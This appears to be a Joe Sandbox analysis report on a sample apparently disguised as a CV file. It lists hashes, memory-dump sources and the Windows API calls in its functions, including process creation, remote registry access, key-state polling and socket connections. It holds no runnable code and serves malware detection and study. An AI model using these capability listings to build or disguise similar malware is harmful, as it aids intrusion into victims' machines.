                                                                                        • API String ID: 1687444384-951712118
                                                                                        • Opcode ID: efe6108059586bd7cab1937d0e7241b7a2ec17ec31fcd9808a0b8e18c523b23d
                                                                                        • Instruction ID: db95bd69d36a3af54f7ac7d7dfcb8d69924a03fe6d61cc74c050f7bb9c988b01
                                                                                        • Opcode Fuzzy Hash: efe6108059586bd7cab1937d0e7241b7a2ec17ec31fcd9808a0b8e18c523b23d
                                                                                        • Instruction Fuzzy Hash: 430180B1544B00DFD722DF75C94A74AB7F0EF55321F20890EE4DA9B6A0CBB4A644CB15
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 003EE33D
                                                                                        • _memset.LIBCMT ref: 003EE34C
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00443D00,00443D44), ref: 003EE37B
                                                                                        • CloseHandle.KERNEL32 ref: 003EE38D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset$CloseCreateHandleProcess
                                                                                        • String ID: D=D
                                                                                        • API String ID: 3277943733-2475372857
                                                                                        • Opcode ID: 78df1a6552fbd5de13a6bfb7b19f31c578171ae80e33ab87ad9321c559b18967
                                                                                        • Instruction ID: a26e538df7fd37c1ef49dcf43a2b950529d4060425a1005381672b5a4ee88297
                                                                                        • Opcode Fuzzy Hash: 78df1a6552fbd5de13a6bfb7b19f31c578171ae80e33ab87ad9321c559b18967
                                                                                        • Instruction Fuzzy Hash: 5CF05EF5940314BAF2115FA5AC46F777E6CDB06B59F004431BE08EA1A2D7759E0086AC
                                                                                        APIs
                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003E19F3
                                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 003E1A26
                                                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 003E1B49
                                                                                        • CloseHandle.KERNEL32(?), ref: 003E1BBF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                        • String ID:
                                                                                        • API String ID: 2364364464-0
                                                                                        • Opcode ID: 0d33ffdc6ccf50c61e1bb3ff06248a1d08e5001a515bda3d8b66f93e7e18c282
                                                                                        • Instruction ID: c3895641c04313018ba0e9eeb6ca83bacaab507b3605680ce27a1b7dfef930fb
                                                                                        • Opcode Fuzzy Hash: 0d33ffdc6ccf50c61e1bb3ff06248a1d08e5001a515bda3d8b66f93e7e18c282
                                                                                        • Instruction Fuzzy Hash: 52817270600215ABDF12AF65C896BAEBBE5AF04720F148459F905AF3D2D7B4ED418F90
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 003C1CB4
                                                                                        • VariantClear.OLEAUT32(00000013), ref: 003C1D26
                                                                                        • VariantClear.OLEAUT32(00000000), ref: 003C1D81
                                                                                        • VariantClear.OLEAUT32(?), ref: 003C1DF8
                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 003C1E26
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$Clear$ChangeInitType
                                                                                        • String ID:
                                                                                        • API String ID: 4136290138-0
                                                                                        • Opcode ID: 17d868a2c3ffdd54f534dbb1299bc4333a3ef08fd60cf377ef38a39cf215aac1
                                                                                        • Instruction ID: fa5068dcade6bc9a988db966d7dbd1c0c330fbc3d8955004d6e796a582cd5863
                                                                                        • Opcode Fuzzy Hash: 17d868a2c3ffdd54f534dbb1299bc4333a3ef08fd60cf377ef38a39cf215aac1
                                                                                        • Instruction Fuzzy Hash: 465149B5A00209EFDB14CF58C884EAAB7B8FF4D314B158559E95ADB301D730EA51CFA0
                                                                                        APIs
                                                                                          • Part of subcall function 0038936C: __swprintf.LIBCMT ref: 003893AB
                                                                                          • Part of subcall function 0038936C: __itow.LIBCMT ref: 003893DF
                                                                                        • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 003E06EE
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 003E077D
                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 003E079B
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 003E07E1
                                                                                        • FreeLibrary.KERNEL32(00000000,00000004), ref: 003E07FB
                                                                                          • Part of subcall function 0039E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,003CA574,?,?,00000000,00000008), ref: 0039E675
                                                                                          • Part of subcall function 0039E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,003CA574,?,?,00000000,00000008), ref: 0039E699
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 327935632-0
                                                                                        • Opcode ID: 6f95711e4a92244f96199719c02a2f0453e260e001d58032d0dbc2a6dcee6e47
                                                                                        • Instruction ID: 7d8bac986e15ba38abbd3154e53fc35885ae2d4ea5979b3a1051d9dbea973759
                                                                                        • Opcode Fuzzy Hash: 6f95711e4a92244f96199719c02a2f0453e260e001d58032d0dbc2a6dcee6e47
                                                                                        • Instruction Fuzzy Hash: 41516975A00255DFCB06EFA8C881DADB7B5BF48310B0581AAE915AB392DB70ED45CB90
                                                                                        APIs
                                                                                          • Part of subcall function 003E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003E2BB5,?,?), ref: 003E3C1D
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003E2EEF
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003E2F2E
                                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 003E2F75
                                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 003E2FA1
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 003E2FAE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                        • String ID:
                                                                                        • API String ID: 3740051246-0
                                                                                        • Opcode ID: a85b0a02bc76a82d125da08649bf9bd2a477d9c6da942971e08c0d4ea84f1b7e
                                                                                        • Instruction ID: 336707b4d0601fd87867e2484719a130480f4259609a554bb40f658d8be2e132
                                                                                        • Opcode Fuzzy Hash: a85b0a02bc76a82d125da08649bf9bd2a477d9c6da942971e08c0d4ea84f1b7e
                                                                                        • Instruction Fuzzy Hash: 46516872608344AFD706EF64C891EABB7F8BF88304F00496DF5959B291DB70E905CB52
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2da1e2a209452b807bea47570755012dd2d3be3b93800ae793d7104b55dd9a94
                                                                                        • Instruction ID: b529d01bf978289ce9bce3520c0ffa0c53cad09521192ee17b4a0370d41664ad
                                                                                        • Opcode Fuzzy Hash: 2da1e2a209452b807bea47570755012dd2d3be3b93800ae793d7104b55dd9a94
                                                                                        • Instruction Fuzzy Hash: 9F41E6399102A4ABC712DB69CC44FAEBB68FB49310F161335F819A72E1C731AD42D654
                                                                                        APIs
                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003D12B4
                                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 003D12DD
                                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 003D131C
                                                                                          • Part of subcall function 0038936C: __swprintf.LIBCMT ref: 003893AB
                                                                                          • Part of subcall function 0038936C: __itow.LIBCMT ref: 003893DF
                                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 003D1341
                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 003D1349
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1389676194-0
                                                                                        • Opcode ID: c84956359e558b2992574c88c5baf7762f817c6972122b3a1de20eb4b0a94bf2
                                                                                        • Instruction ID: 3d874b596ff7ca4d4232167af2cd6a22b6c9016b4ac08fdf92acb567308dfde6
                                                                                        • Opcode Fuzzy Hash: c84956359e558b2992574c88c5baf7762f817c6972122b3a1de20eb4b0a94bf2
                                                                                        • Instruction Fuzzy Hash: 4441FD35A00605DFDF02EF64C981AADBBF5EF08314B1480A9E905AF361DB71ED05DB51
                                                                                        APIs
                                                                                        • GetCursorPos.USER32(000000FF), ref: 0039B64F
                                                                                        • ScreenToClient.USER32(00000000,000000FF), ref: 0039B66C
                                                                                        • GetAsyncKeyState.USER32(00000001), ref: 0039B691
                                                                                        • GetAsyncKeyState.USER32(00000002), ref: 0039B69F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                                        • String ID:
                                                                                        • API String ID: 4210589936-0
                                                                                        • Opcode ID: 47859b9ad50346c1653b53895f6ba96aec0d83312a05e5da42b067ef7b50af18
                                                                                        • Instruction ID: 286e81d4ada5acbe142492516c031a3b74c3aa009db6b31d7153cec249fc8eaf
                                                                                        • Opcode Fuzzy Hash: 47859b9ad50346c1653b53895f6ba96aec0d83312a05e5da42b067ef7b50af18
                                                                                        • Instruction Fuzzy Hash: 59416E35908219BBCF169F64C948EE9FB75BB05324F104319E929A62D0CB34A994DF91
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(?,?), ref: 003BB369
                                                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 003BB413
                                                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 003BB41B
                                                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 003BB429
                                                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 003BB431
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePostSleep$RectWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3382505437-0
                                                                                        • Opcode ID: e18f8ae412104772d70cddf819f8cbf90ca57684674d612462cecc47679323a8
                                                                                        • Instruction ID: a3674a619b93d153e9e95c3caabd5805bf2c9ff34d44e64b18e1ef4cafb9c258
                                                                                        • Opcode Fuzzy Hash: e18f8ae412104772d70cddf819f8cbf90ca57684674d612462cecc47679323a8
                                                                                        • Instruction Fuzzy Hash: 7531BD71900219EBDF04CFA8DE4DADEBBB5FB04319F114229FA25AB5D1CBB09954CB90
                                                                                        APIs
                                                                                        • IsWindowVisible.USER32(?), ref: 003BDBD7
                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 003BDBF4
                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 003BDC2C
                                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 003BDC52
                                                                                        • _wcsstr.LIBCMT ref: 003BDC5C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                        • String ID:
                                                                                        • API String ID: 3902887630-0
                                                                                        • Opcode ID: 93bd7bb6c009815a03c83f8bb209d8f3430a7908de5ae409a59c088d8475a61c
                                                                                        • Instruction ID: d6103dcf0f9f6eb74e1bd2b33ebf1a49b57b4696cec63fd14f39b858ba45618f
                                                                                        • Opcode Fuzzy Hash: 93bd7bb6c009815a03c83f8bb209d8f3430a7908de5ae409a59c088d8475a61c
                                                                                        • Instruction Fuzzy Hash: 91214971204100BBEB169F799D49EBB7FACDF45724F118039F909DA081FAB1CC01D260
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003BBC90
                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003BBCC2
                                                                                        • __itow.LIBCMT ref: 003BBCDA
                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003BBD00
                                                                                        • __itow.LIBCMT ref: 003BBD11
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$__itow
                                                                                        • String ID:
                                                                                        • API String ID: 3379773720-0
                                                                                        • Opcode ID: a768f5911dde147ce148a451a2e23f2c7179730fe5c81113db4523c6bfd4ffaf
                                                                                        • Instruction ID: ced8cab7fe53a3311a372a8c94a0fd30755141c95b97c4d31c4141bff4c3ebe3
                                                                                        • Opcode Fuzzy Hash: a768f5911dde147ce148a451a2e23f2c7179730fe5c81113db4523c6bfd4ffaf
                                                                                        • Instruction Fuzzy Hash: FE21D775A002086BDB12AE648D46FDEBB6CAF8A314F000465FA05EF181DFB4890583A1
                                                                                        APIs
                                                                                          • Part of subcall function 003850E6: _wcsncpy.LIBCMT ref: 003850FA
                                                                                        • GetFileAttributesW.KERNEL32(?,?,?,?,003C60C3), ref: 003C6369
                                                                                        • GetLastError.KERNEL32(?,?,?,003C60C3), ref: 003C6374
                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,003C60C3), ref: 003C6388
                                                                                        • _wcsrchr.LIBCMT ref: 003C63AA
                                                                                          • Part of subcall function 003C6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,003C60C3), ref: 003C63E0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                        • String ID:
                                                                                        • API String ID: 3633006590-0
                                                                                        • Opcode ID: 599ab524faef3b1424e87b038e8d25d2789655eb519b7cb582738500ec20cf22
                                                                                        • Instruction ID: cd68c8a836cdd3d7fb55e654b7fb4d35fa75e42313f3ff5f4ec8b9a9c3684c7c
                                                                                        • Opcode Fuzzy Hash: 599ab524faef3b1424e87b038e8d25d2789655eb519b7cb582738500ec20cf22
                                                                                        • Instruction Fuzzy Hash: ED21D8359042555ADF17AB789C43FEA236CEF06360F1104ADF045DB0E1EF60DD848B65
                                                                                        APIs
                                                                                          • Part of subcall function 003DA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 003DA84E
                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 003D8BD3
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 003D8BE2
                                                                                        • connect.WSOCK32(00000000,?,00000010), ref: 003D8BFE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastconnectinet_addrsocket
                                                                                        • String ID:
                                                                                        • API String ID: 3701255441-0
                                                                                        • Opcode ID: e7d7be0201840874fbbda8a6f484f2d7548585157eb069f2689cebcb3573aae6
                                                                                        • Instruction ID: 43cac0d20629adc4e3b73dab241529446d47eae1094719324cd81bcbbce238f6
                                                                                        • Opcode Fuzzy Hash: e7d7be0201840874fbbda8a6f484f2d7548585157eb069f2689cebcb3573aae6
                                                                                        • Instruction Fuzzy Hash: 8F218E326002149FCB16AF68DD85F7EB7A9EF48710F04445AF916AB392CB74EC058B61
                                                                                        APIs
                                                                                        • IsWindow.USER32(00000000), ref: 003D8441
                                                                                        • GetForegroundWindow.USER32 ref: 003D8458
                                                                                        • GetDC.USER32(00000000), ref: 003D8494
                                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 003D84A0
                                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 003D84DB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ForegroundPixelRelease
                                                                                        • String ID:
                                                                                        • API String ID: 4156661090-0
                                                                                        • Opcode ID: 60d9a4ee1ef3ede48a934bcd042ee139bded2fb7b0344bfc39ca3c0805c04048
                                                                                        • Instruction ID: 2c28890a2d019ecee1655006e8e7f1e21706098a48acf5c97d6edf3481dbb1d7
                                                                                        • Opcode Fuzzy Hash: 60d9a4ee1ef3ede48a934bcd042ee139bded2fb7b0344bfc39ca3c0805c04048
                                                                                        • Instruction Fuzzy Hash: 12218176A00204AFD701EFA5D985AAEBBF5EF48301F048879E859AB351DF70AC04CB60
                                                                                        APIs
                                                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0039AFE3
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0039AFF2
                                                                                        • BeginPath.GDI32(?), ref: 0039B009
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0039B033
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                                        • String ID:
                                                                                        • API String ID: 3225163088-0
                                                                                        • Opcode ID: 0cbbaab0fe68cddd4a4e387f8e02a336f8df9ec96c902e0ddaeebcf9fa6e5b01
                                                                                        • Instruction ID: 95d2603cd9c0da01c21050db22da1635ec2dfce24c3a753a62dc12187fd9fd05
                                                                                        • Opcode Fuzzy Hash: 0cbbaab0fe68cddd4a4e387f8e02a336f8df9ec96c902e0ddaeebcf9fa6e5b01
